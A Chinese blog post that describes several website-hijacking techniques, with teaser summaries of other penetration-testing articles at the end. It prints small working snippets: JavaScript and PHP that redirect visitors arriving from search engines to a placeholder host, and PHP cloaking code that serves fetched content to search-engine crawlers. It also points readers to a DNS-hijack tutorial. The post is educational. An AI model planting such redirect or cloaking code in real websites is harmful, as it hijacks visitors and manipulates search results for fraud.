关于网站劫持的几种方式

重温素晴，我笑成了一个煞笔 😂(也许本来就本来吧)

综合两篇文章，劫持的案例属实不少，简单记几个我在本地实现了的吧:

1、前端搜索引擎劫持

前端搜索引擎劫持指攻击者在前端 js 中插入恶意 js 脚本以达到搜索引擎劫持的目的。

恶意 js 例：


<script>

var referrer=document.referrer; if(referrer.indexOf("baidu")>0||referrer.indexOf("google")>0||referrer.indexOf("yahoo")>0||referrer.indexOf("sogou")>0||referrer.indexOf("youdao")>0||referrer.indexOf("bing")>0)

{self.location='http://www.xxxx.com';}

</script>

正常访问这个网页时，不会发生跳转，但是如果来源 URL(请求头中的 referer)中存在 baidu、google、yahoo、sogou、youdao、bing 等搜索引擎特征的字段，则跳转到 http://www.xxxx.com。

例:直接从 url 搜索栏访问页面地址，恶意 js 不会被触发

但是如果在百度里点击，劫包能发现 referer 有百度字样，触发 js。

跳走了。你看我完全是不懂哦~

2、后端搜索引擎劫持

后端搜索引擎劫持，和前端搜索引擎劫持也一样，也是攻击者在后端代码中插入恶意后端代码以实现搜索引擎劫持的目的。代码样例,根据 referer 中关键字实现：

<?php

    if(stristr($_SERVER['HTTP_REFERER'],"baidu") or stristr($_SERVER['HTTP_REFERER'],"google") or stristr($_SERVER['HTTP_REFERER'],"yahoo") or stristr($_SERVER['HTTP_REFERER'],"sogou"))

     {

    Header("Location:http://www.xxx.com/");

    }

?>

看个例子:直接访问 back.php 啥也没有，因为啥也没写嘛

之后就和前端劫持一样了，从百度走，会跳页面，这次跳一个我上周写(cover)的一个页面

3、快照劫持

文章里的原理描述:"快照劫持指攻击者入侵了某个权重较高的网站后，在 web 应用文件中插入恶意代码。恶意代码会判断访问该网站的是不是百度、google 等搜索引擎的蜘蛛爬虫，如果是，则输出私服或博彩等暴利行业的网站的内容给搜索引擎爬虫以达到搜索引擎劫持的目的。"

其实通俗的讲就是，我点击百度快照，发现网页跳转到了我非预期要访问的网站去了。代码例:

<?php

        error_reporting(0);

        if(stristr ($_SERVER['HTTP_USER_AGENT'],"baidu") or stristr ($_SERVER['HTTP_USER_AGENT'],"google"))

        {

        $cont = file_get_contents('http://www.xxx.com');

        echo $cont;

        }

        else{

        echo “hello world”;

        }

?>

其实和前、后端劫持不同的地方是在请求头的 User-Agent 字段中存在搜索引擎爬虫的特征去了，而不是在 referer 中搜关键字。来个例子:

很明显访问下面 php 界面 user-agent 是没有爬虫相关特征的，所以页面访问正常:

然后我来手动添加一个百度爬虫特征

(compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

跳走了。

4、nginx 反向代理劫持

一言以概之就是去人家服务器上改配置呗(上面不也是去人家服务器改代码嘛)，好，那我去另找个服务器改一下

跳走了。

5、DNS 劫持

就更直接了，通过攻击域名解析服务器（DNS），或者直接伪造域名解析服务器（DNS），把目标网站域名解析到错误的 IP 地址从而实现用户无法访问目标网站的目的或者蓄意或恶意要求用户访问指定 IP 地址（网站）的目的。

条件有限就不试了，贴个 B 站文章的一个劫持流程图，有兴趣可以去跟着这篇文章试试:DNS 劫持（看完你也能做到）

原理啥的网络的师傅们都懂吧，我看我完全是不懂哦~

6、IIS 恶意模块劫持

我就更不懂了哦~

彩蛋:点击劫持

就这种有两个关闭按钮，有一个是误导人进错的算是劫持吗，给爷爬！

客户端安全测试小结

【C/S 架构安全测试】客户端安全测试小结前言因项目需求，需要给 C/S 客户端应用系统做一次安全测试，特写此片文章来记录一下实战过程中所涉及的知识，欢迎各路大佬指点。在做 C/S 客户端测试的时候，跟以往渗透测试有一定的区别，我们通常都是 web 渗透测试或者 app 渗透，前期都是基于信息收集、漏洞扫描、漏洞 ..

渗透测试框架 metasploit

0x00 简介 Metasploit 是一款开源安全漏洞检测工具，可以用于渗透测试不同的系统和框架，附带数百个已知的软件漏洞，并保持频繁更新。 Metasploit 框架是用 Ruby 语言开发的，包括 Perl 写的脚本，C ，汇编，和 Python 各种组件，并且可以由用户自行编写代码加入 Metasploit 的 ..

sql 注入盲注时常用函数

0x00 盲注盲注是不能通过直接显示的途径来获取数据库数据的方法，在盲注中，攻击者根据其返回页面的不同来判断信息。盲注一般可分为三类：Booleanbase、Timebase、Errorbase。接下来介绍一些 sql 盲注中常用的函数。 0x01 limit() limit()函数的作用是限制由 SELECT 语 ..

redis 未授权访问漏洞

0x00 redis Redis 是一个高性能的 key-value 数据库。它支持存储的 value 类型相对更多，包括 string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和 hash（哈希类型）。这些数据类型都支持 push/pop、add/remove 及取交集 ..

跨站脚本攻击 XSS

0x00 XSS XSS，跨站脚本攻击(Cross Site Scripting)，恶意攻击者往 Web 页面里插入恶意 Script 代码，当用户浏览该页之时，嵌入其中 Web 里面的 Script 代码会被执行，从而达到恶意攻击用户的目的。比如获取用户 Cookie，会话劫持，钓鱼欺骗等多种攻击。 0x01 XSS ..

信息收集工具与用法

whois：介绍：whois 是一个标准的互联网协议，可用于收集网络注册/注册域名/ip 地址和自治系统的信息用法：whois example.com host：介绍：我们可以用 host 指令向 dns 服务器查询主机的 ip 地址用法：host [链接] dig：介绍：用于 dns 查询，相比 host， ..

渗透测试方法论

一： 1 渗透测试的种类： 1.1 黑盒测试：在不清楚被测单位的内部技术构造的情况下，从外部评估网络基础设施的安全性。测试的市场报价高于白盒测试。 1.2 白盒测试：可以获取被测单位内部资料甚至不公开资料，渗透视野更开阔，测试人员可以以最小的工作量达到最高的评估精准度，测试时间/成本以及发现/ 解决安全弱点的技术门槛都 ..

欢迎来到这里！

我们正在构建一个小众社区，大家在这里相互信任，以平等 • 自由 • 奔放的价值观进行分享交流。最终，希望大家能够找到与自己志同道合的伙伴，共同成长。

关于